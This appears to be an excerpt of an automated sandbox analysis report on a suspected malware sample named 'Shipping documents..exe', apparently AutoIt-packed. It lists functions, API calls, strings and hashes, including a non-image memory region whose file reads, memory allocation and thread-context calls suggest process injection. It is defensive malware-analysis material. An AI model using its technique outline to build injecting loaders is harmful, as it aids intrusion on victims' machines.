                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                          • String ID: ,*H$4*H$@fI
                                                                                                          • API String ID: 615853336-1459471987
                                                                                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                          Function 03EB5258 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2065 3eb5258-3eb5306 call 3eb2c48 2068 3eb530d-3eb5333 call 3eb6168 CreateFileW 2065->2068 2071 3eb533a-3eb534a 2068->2071 2072 3eb5335 2068->2072 2077 3eb534c 2071->2077 2078 3eb5351-3eb536b VirtualAlloc 2071->2078 2073 3eb5485-3eb5489 2072->2073 2074 3eb54cb-3eb54ce 2073->2074 2075 3eb548b-3eb548f 2073->2075 2079 3eb54d1-3eb54d8 2074->2079 2080 3eb549b-3eb549f 2075->2080 2081 3eb5491-3eb5494 2075->2081 2077->2073 2082 3eb536d 2078->2082 2083 3eb5372-3eb5389 ReadFile 2078->2083 2084 3eb54da-3eb54e5 2079->2084 2085 3eb552d-3eb5542 2079->2085 2086 3eb54af-3eb54b3 2080->2086 2087 3eb54a1-3eb54ab 2080->2087 2081->2080 2082->2073 2090 3eb538b 2083->2090 2091 3eb5390-3eb53d0 VirtualAlloc 2083->2091 2092 3eb54e9-3eb54f5 2084->2092 2093 3eb54e7 2084->2093 2094 3eb5552-3eb555a 2085->2094 2095 3eb5544-3eb554f VirtualFree 2085->2095 2088 3eb54c3 2086->2088 2089 3eb54b5-3eb54bf 2086->2089 2087->2086 2088->2074 2089->2088 2090->2073 2096 3eb53d2 2091->2096 2097 3eb53d7-3eb53f2 call 3eb63b8 2091->2097 2098 3eb5509-3eb5515 2092->2098 2099 3eb54f7-3eb5507 2092->2099 2093->2085 2095->2094 2096->2073 2105 3eb53fd-3eb5407 2097->2105 2102 3eb5522-3eb5528 2098->2102 2103 3eb5517-3eb5520 2098->2103 2101 3eb552b 2099->2101 2101->2079 2102->2101 2103->2101 2106 3eb543a-3eb544e call 3eb61c8 2105->2106 2107 3eb5409-3eb5438 call 3eb63b8 2105->2107 2112 3eb5452-3eb5456 2106->2112 2113 3eb5450 2106->2113 2107->2105 2115 3eb5458-3eb545c CloseHandle 2112->2115 2116 3eb5462-3eb5466 2112->2116 2113->2073 2115->2116 2117 3eb5468-3eb5473 VirtualFree 2116->2117 2118 3eb5476-3eb547f 2116->2118 2117->2118 2118->2068 2118->2073
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03EB5329
                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03EB554F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 204039940-0
                                                                                                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                          • Instruction ID: e61e0bbb54dd897c97e3f24ec2d5d008242f7ef7c09744202c0256b67bb1fd77
                                                                                                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                          • Instruction Fuzzy Hash: 91A11674E00209EBDB15CFA4C894BEEB7B5BF49305F249699E201BB2C0D775AA40CF60
                                                                                                          Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                                                                          APIs
                                                                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                          • String ID: C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 3170942423-2870460739
                                                                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                          Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2148 4012c5-4012cb 2146->2148 2149 42733f-427346 2146->2149 2150 4272f4-427315 Shell_NotifyIconW 2147->2150 2151 42731a-42733a Shell_NotifyIconW 2147->2151 2148->2144 2154 427393-4273b4 Shell_NotifyIconW 2148->2154 2152 427348-427369 Shell_NotifyIconW 2149->2152 2153 42736e-42738e Shell_NotifyIconW 2149->2153 2150->2144 2151->2144 2152->2144 2153->2144 2154->2144
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3300667738-0
                                                                                                          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                          Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseOpen
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                          • API String ID: 1586453840-614718249
                                                                                                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                          Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateShow
                                                                                                          • String ID: AutoIt v3$edit
                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                          Function 03EB4FF8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 03EB4EE8: Sleep.KERNELBASE(000001F4), ref: 03EB4EF9
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EB5151
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileSleep
                                                                                                          • String ID: 35Q7OMHSHM5OCYIBGHHRG
                                                                                                          • API String ID: 2694422964-628726074
                                                                                                          • Opcode ID: 124f1f2544c8d910d327953a82f04015108fdaa75b657f4dd125d27d13578582
                                                                                                          • Instruction ID: 9aac5f5430756be464ba0006d53e2d5384028ff61fd59422ce4879a6c1e5edfe
                                                                                                          • Opcode Fuzzy Hash: 124f1f2544c8d910d327953a82f04015108fdaa75b657f4dd125d27d13578582
                                                                                                          • Instruction Fuzzy Hash: 1F619230D04248DAEF12DBB4D844BEFBB75AF19304F044599E248BB2C1D7BA5B49CB65
                                                                                                          Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$OpenQueryValue
                                                                                                          • String ID: Control Panel\Mouse
                                                                                                          • API String ID: 1607946009-824357125
                                                                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                          Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 0-554117064
                                                                                                          • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                          • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                          Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentTerminate
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 2429186680-554117064
                                                                                                          • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                          • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                          Function 03EB3EE8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03EB46A3
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EB4739
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EB475B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2438371351-0
                                                                                                          • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                          • Instruction ID: ba529aed71e29a3c23b47a9a3e20258e5053ab4d110e3626cbe2329811290d7a
                                                                                                          • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                                          • Instruction Fuzzy Hash: D462F830A14258DBEB24CBA4C851BDEB376EF58304F10A1A9D10DEB3D1E6799E81CF59
                                                                                                          Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                          • _free.LIBCMT ref: 004295A0
                                                                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 3938964917-2335243149
                                                                                                          • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                          • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                                                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                          Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
